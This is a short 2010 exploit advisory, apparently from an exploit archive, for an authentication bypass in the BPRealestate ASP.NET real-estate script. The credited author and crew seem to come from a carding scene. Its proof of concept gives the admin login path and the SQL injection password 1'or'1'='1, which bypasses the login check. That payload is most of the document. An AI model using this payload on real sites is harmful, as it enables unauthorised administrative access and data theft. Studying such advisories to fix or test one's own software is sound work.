BPRealestate Authentication Bypass Vulnerability

2010-11-16
ID: 65195
CVE: None
Download vulnerable application: None
-----------------------------------------------------------------------
          
-----------------------------------------------------------------------
Author  : v3n0m
Site    : http://yogyacarderlink.web.id/
Date: November, 16-2010
Location: Jakarta, Indonesia
Time Zone: GMT +7:00

Application: BPRealestate - Real Estate site script - ASP.NET AJAX
Price: $24.90
Vendor  : http://www.bpowerhouse.info/

Exploit & p0c
_____________

go to
http://127.0.0.1/[path]/admin

then login with
Username : admin
Password : 1'or'1'='1

ShoutZ
______

All YOGYACARDERLINK CREW, GheMaX, LeQhi
Also Jovita & Fabian :)
1-4-2 (www01)